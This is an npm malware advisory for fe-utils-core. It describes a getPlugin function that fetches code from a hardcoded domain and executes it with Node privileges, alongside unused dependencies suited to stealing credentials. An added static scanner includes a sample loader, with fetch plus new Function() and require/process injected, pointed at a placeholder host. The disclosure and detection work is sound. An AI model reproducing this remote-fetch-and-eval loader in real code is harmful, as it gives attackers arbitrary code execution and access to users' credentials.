MAL-2026-4561
Malicious code in fe-utils-core (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6181b15ad071542a35154cffc71bc4771db039f548eabfe4100271000e4e3116)

The package's default-exported getPlugin function fetches https://svganchordev.net/icons/110 and passes the response's data.credits field to new Function() with require, process, Buffer, module, exports, and Promise injected as parameters, executing arbitrary attacker-controlled JavaScript with full Node privileges whenever a caller invokes the documented API. The endpoint is hardcoded to a domain unrelated to the package's stated purpose and is not mentioned in the README. Errors are swallowed and the request is silently retried, which is consistent with covert C2 behavior.

The declared dependency set (@primno/dpapi for Windows DPAPI decryption, node-machine-id, better-sqlite3 and sqlite3 for browser/credential database access, socket.io-client for persistent C2, and axios/express/request) is unused by the small advertised utility surface (~30 lines of debounce/throttle/isEmpty helpers in src/utils.js) but is pre-positioned in node_modules so that a remote-fetched payload can require() these capabilities without a second fetch. Because the second stage is fetched at call time, the published package contents never contain the final payload; the on-disk indicators are the loader itself and the mismatch between the declared dependencies and the code that actually uses them. The combination of remote-fetch-and-eval with a credential-harvesting toolkit pre-installed as dependencies leaves no benign interpretation.
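The three on-disk indicators described above (a new Function() call with Node privilege objects injected, a hardcoded host unrelated to the project, and declared dependencies that no source file imports) can be checked statically before a package is ever executed. The scanner below is an added example written for this page; it is not code from the advisory, from Amazon Inspector, or from fe-utils-core. The sample package.json and source strings at the bottom are constructed to mirror the described shape (with an .invalid domain) and are only inspected as text, never run. The function names, the three-way verdict, and the regex heuristics are this example's own assumptions, not a published detection rule.

```javascript
// Added example (not the advisory's or the package's code): a static triage
// scanner for the loader pattern described above. It flags
//   (1) new Function() calls whose parameter list names Node privilege objects,
//   (2) literal URLs whose host is neither the registry nor the project's own, and
//   (3) declared dependencies that no source file ever require()s or imports.
// The sample package at the bottom is constructed for illustration and is
// never executed; the scanner only reads it as text.
'use strict';

const PRIVILEGE_NAMES = ['require', 'process', 'Buffer', 'module', 'exports'];
const NEW_FUNCTION_RE = /new\s+Function\s*\(([^)]*)\)/g;
const LITERAL_URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;
const REQUIRE_RE = /\brequire\(\s*['"]([^'"]+)['"]\s*\)/g;
const IMPORT_RE = /\bfrom\s+['"]([^'"]+)['"]/g;

// Reduce a module specifier to its npm package name.
// '@scope/pkg/sub' -> '@scope/pkg', 'pkg/sub' -> 'pkg', './local' -> null.
function packageNameOf(spec) {
  if (spec.startsWith('.') || spec.startsWith('/')) return null;
  const parts = spec.split('/');
  return spec.startsWith('@') ? parts.slice(0, 2).join('/') : parts[0];
}

// Hosts the package legitimately points at: the registry plus homepage/repository.
function expectedHosts(pkg) {
  const hosts = new Set(['registry.npmjs.org']);
  const urls = [pkg.homepage, pkg.repository && pkg.repository.url].filter(Boolean);
  for (const u of urls) for (const m of u.matchAll(LITERAL_URL_RE)) hosts.add(m[1].toLowerCase());
  return hosts;
}

// Indicator 1: dynamic code construction with Node privileges handed in as parameters.
function findPrivilegedDynamicCode(src) {
  const hits = [];
  for (const m of src.matchAll(NEW_FUNCTION_RE)) {
    const injected = PRIVILEGE_NAMES.filter(n => new RegExp(`['"]${n}['"]`).test(m[1]));
    if (injected.length) hits.push({ index: m.index, injected });
  }
  return hits;
}

// Indicator 2: hardcoded hosts unrelated to the project's declared URLs.
function findForeignHosts(src, pkg) {
  const known = expectedHosts(pkg);
  const foreign = new Set();
  for (const m of src.matchAll(LITERAL_URL_RE)) {
    const host = m[1].toLowerCase();
    if (!known.has(host)) foreign.add(host);
  }
  return [...foreign];
}

// Indicator 3: dependencies declared in package.json but never imported anywhere.
function findUnusedDependencies(pkg, sources) {
  const used = new Set();
  for (const src of Object.values(sources)) {
    for (const re of [REQUIRE_RE, IMPORT_RE]) {
      for (const m of src.matchAll(re)) {
        const name = packageNameOf(m[1]);
        if (name) used.add(name);
      }
    }
  }
  return Object.keys(pkg.dependencies || {}).filter(d => !used.has(d));
}

// sources: { 'relative/path.js': fileContents }
function scanPackage(pkg, sources) {
  const dynamicCode = [];
  const foreignHosts = new Set();
  for (const [file, src] of Object.entries(sources)) {
    for (const hit of findPrivilegedDynamicCode(src)) dynamicCode.push({ file, ...hit });
    for (const h of findForeignHosts(src, pkg)) foreignHosts.add(h);
  }
  const unusedDependencies = findUnusedDependencies(pkg, sources);
  // Remote-fetch-and-eval plus pre-positioned unused capabilities is the
  // combination the advisory describes; either half alone only warrants review.
  const verdict = dynamicCode.length && foreignHosts.size
    ? (unusedDependencies.length ? 'malicious-pattern' : 'review')
    : (unusedDependencies.length ? 'review' : 'clean');
  return { dynamicCode, foreignHosts: [...foreignHosts], unusedDependencies, verdict };
}

// Constructed sample mirroring the described shape (hypothetical names, .invalid TLD, never run).
const SAMPLE_PKG = {
  name: 'sample-utils',
  homepage: 'https://github.com/example/sample-utils',
  dependencies: { axios: '^1.6.0', lodash: '^4.17.0', 'better-sqlite3': '^9.0.0', 'node-machine-id': '^1.1.0' },
};
const SAMPLE_SOURCES = {
  'src/utils.js': "const _ = require('lodash');\nmodule.exports = { isEmpty: v => _.isEmpty(v) };",
  'index.js': `const axios = require('axios');
module.exports = async function getPlugin() {
  const res = await axios.get('https://plugins.example-cdn.invalid/icons/1');
  const fn = new Function('require', 'process', 'Buffer', 'module', 'exports', res.data.credits);
  return fn(require, process, Buffer, module, exports);
};`,
};

console.log(JSON.stringify(scanPackage(SAMPLE_PKG, SAMPLE_SOURCES), null, 2));
```

Run it against an unpacked tarball by reading each .js file into the sources map. The regexes are deliberately permissive (they will flag a legitimate `new Function('require', ...)` shim or a CDN URL in a comment), so treat 'review' as a prompt to read the file, and 'malicious-pattern' as the conjunction of all three indicators the advisory relies on rather than proof on its own.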
Affected packages
No fixed version has been published for fe-utils-core (npm), and this advisory does not identify any version as safe. Remove the package from your dependency tree rather than pinning it, and treat any host on which its getPlugin API was invoked as having run attacker-controlled code with full Node privileges.